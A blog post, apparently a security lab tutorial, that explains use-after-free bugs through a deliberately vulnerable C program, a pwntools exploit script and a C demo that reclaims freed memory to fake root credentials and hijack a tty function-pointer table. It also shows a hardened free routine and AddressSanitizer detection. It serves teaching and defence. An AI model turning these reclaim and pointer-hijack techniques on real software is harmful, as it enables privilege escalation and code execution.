strangerRidingCaml
9. Use-After-Free (UAF) Vulnerabilities (feat. struct cred, tty_struct)
woddlwoddl 2024. 5. 12. 03:04
Use-After-Free (UAF) vulnerabilities occur when a program continues to use a pointer after the memory it points to has been freed. The allocator may hand that memory out again for a different object, so reads through the stale pointer return whatever the new object contains and writes through it corrupt that object. When the reused memory holds credentials or function pointers, this leads to privilege escalation or code execution.
Lab Activity: Use-After-Free (UAF) Exploit
In this lab activity, we'll demonstrate a UAF on a deliberately vulnerable C program that uses userspace stand-ins for the kernel's struct cred (which holds a task's uid and gid) and tty_struct (which holds the ops pointer to its function table).
Defender Side Code:
The defender side code simulates a vulnerable program that frees a struct cred object and then keeps using the dangling pointer, which is the UAF.
#include <stdio.h>
#include <stdlib.h>

// Userspace stand-ins for the kernel's struct cred and tty_struct
struct cred {
    int uid;
    int gid;
    // Other fields
};

struct tty_struct {
    int index; // Placeholder field (an empty struct is not valid standard C)
};

void vulnerable_function(struct cred *ptr_cred, struct tty_struct *ptr_tty) {
    free(ptr_cred); // Free the struct cred object
    // Do some other operations
    // Use after free: ptr_cred is dangling but is still dereferenced
    printf("uid read through freed cred: %d\n", ptr_cred->uid);
    (void)ptr_tty; // tty_struct is allocated but not used further in this mock-up
}

int main(void) {
    // Allocate memory for struct cred and tty_struct
    struct cred *ptr_cred = (struct cred *)malloc(sizeof(struct cred));
    struct tty_struct *ptr_tty = (struct tty_struct *)malloc(sizeof(struct tty_struct));
    ptr_cred->uid = 1000;
    ptr_cred->gid = 1000;
    vulnerable_function(ptr_cred, ptr_tty); // Call vulnerable function
    free(ptr_tty);
    return 0;
}
To compile the defender side code:
gcc -o vulnerable_program vulnerable_program.c
To have the use-after-free reported at the offending line instead of silently reading stale memory, build with AddressSanitizer:
gcc -g -fsanitize=address -o vulnerable_program vulnerable_program.c
Exploit Code (Python using pwntools):
from pwn import *

# Address of the vulnerable function (example address, adjust as necessary;
# a fixed address is only meaningful for a non-PIE build without ASLR)
vulnerable_function_addr = 0x004005f7
# Address of system() or another target function (example address, adjust as necessary)
system_addr = 0x00400500

# Launch the vulnerable program locally
p = process("./vulnerable_program")

# Payload intended to land in the chunk the freed struct cred occupied:
# the first 8 bytes cover uid and gid, the next 8 bytes carry the target address
payload = b"A" * 8 + p64(system_addr)
p.sendline(payload)

# Interactive shell
p.interactive()
The script launches the program and sends a payload meant to land in the chunk that the freed struct cred occupied, so that later uses of the stale pointer see attacker-chosen bytes. Two caveats apply to the mock-up above. First, the program never reads input, so the payload has nowhere to go; a real target needs an allocation of the same size as the freed object that is filled from attacker-controlled data (the reclaim, or heap spray, step). Second, struct cred holds identifiers, not function pointers: reclaiming a freed cred is used to make uid and gid read as 0, whereas code execution through a UAF comes from objects such as tty_struct, whose ops pointer is redirected to an attacker-controlled function table. The hard-coded addresses also assume a non-PIE binary without ASLR; otherwise they must be leaked at runtime.
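The following is an added example, not code from the original post, that shows the reclaim step the mock-up and the pwntools script above leave out, for both objects named in the title. The struct cred, tty_operations and tty_struct layouts are simplified stand-ins (assumptions, not the kernel's real definitions), and the chunk reuse relies on glibc's tcache handing a just-freed chunk back to the next same-size request; on a different allocator the demo reports that the chunk was not reused instead of faking a result. A hardened release routine is included beside the vulnerable pattern.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Userspace stand-ins (hypothetical layouts) for the two kernel objects named
 * in the post. Only uid/gid and the ops pointer matter for the demonstration. */
struct cred {
    int uid;
    int gid;
};

struct tty_operations {
    int (*ioctl)(unsigned int cmd);
};

struct tty_struct {
    const struct tty_operations *ops;   /* function-pointer table, as in the kernel */
    int index;
};

/* Legitimate ioctl handler and the table the "kernel" installs. */
static int real_ioctl(unsigned int cmd) { return (int)cmd; }
static const struct tty_operations real_ops = { .ioctl = real_ioctl };

/* Attacker-supplied handler: where control flow lands once ops is hijacked. */
static int hijacked_ioctl(unsigned int cmd) { (void)cmd; return -1337; }
static const struct tty_operations fake_ops = { .ioctl = hijacked_ioctl };

/* Variant 1: struct cred. A stale cred pointer survives the free; the attacker
 * reclaims the chunk with a same-size allocation filled with zeros, so the
 * stale pointer now reads uid = gid = 0 (root).
 * Returns 1 if the allocator reused the chunk and the stale read saw uid 0. */
int cred_uaf_demo(void) {
    struct cred *task_cred = malloc(sizeof *task_cred);
    task_cred->uid = 1000;
    task_cred->gid = 1000;

    struct cred *stale = task_cred;      /* dangling reference kept past the free */
    free(task_cred);

    /* Reclaim step: glibc tcache returns the just-freed chunk for a same-size request. */
    unsigned char *spray = malloc(sizeof(struct cred));
    memset(spray, 0, sizeof(struct cred));

    int reused = ((uintptr_t)spray == (uintptr_t)stale);
    int uid_seen = stale->uid;           /* use after free */
    free(spray);
    return reused && uid_seen == 0;
}

/* Variant 2: tty_struct. The stale tty pointer is used for an ioctl after the
 * object was freed; the attacker reclaims the chunk with a fake tty_struct whose
 * ops points at an attacker-controlled table, so the call dispatches there.
 * Returns what the handler that actually ran produced: cmd if the real one, -1337 if hijacked. */
int tty_uaf_demo(unsigned int cmd) {
    struct tty_struct *tty = malloc(sizeof *tty);
    tty->ops = &real_ops;
    tty->index = 0;

    struct tty_struct *stale = tty;
    free(tty);

    struct tty_struct *fake = malloc(sizeof *fake);   /* same size -> same chunk */
    fake->ops = &fake_ops;
    fake->index = 0;

    int result = stale->ops->ioctl(cmd);  /* use after free: goes through fake_ops */
    free(fake);
    return result;
}

/* Hardened release: free and null the reference so a later use fails a NULL
 * check instead of reading attacker-controlled memory. */
static void release_cred(struct cred **pp) {
    free(*pp);
    *pp = NULL;
}

/* Returns 1 if the stale use was refused after the hardened release. */
int cred_fixed_demo(void) {
    struct cred *task_cred = malloc(sizeof *task_cred);
    task_cred->uid = 1000;
    release_cred(&task_cred);

    unsigned char *spray = malloc(sizeof(struct cred));   /* attacker reclaims anyway */
    memset(spray, 0, sizeof(struct cred));
    int refused = (task_cred == NULL);    /* the use site checks before dereferencing */
    free(spray);
    return refused;
}

int main(void) {
    printf("cred UAF: stale pointer reads uid 0 -> %s\n", cred_uaf_demo() ? "yes" : "no");
    printf("tty UAF: ioctl(7) returned %d (-1337 means hijacked)\n", tty_uaf_demo(7));
    printf("hardened release refused stale use -> %s\n", cred_fixed_demo() ? "yes" : "no");
    return 0;
}
```

Build it without AddressSanitizer to see the reuse happen; with -fsanitize=address the first stale read is reported as a heap-use-after-free, which is the detection you want in a real code base.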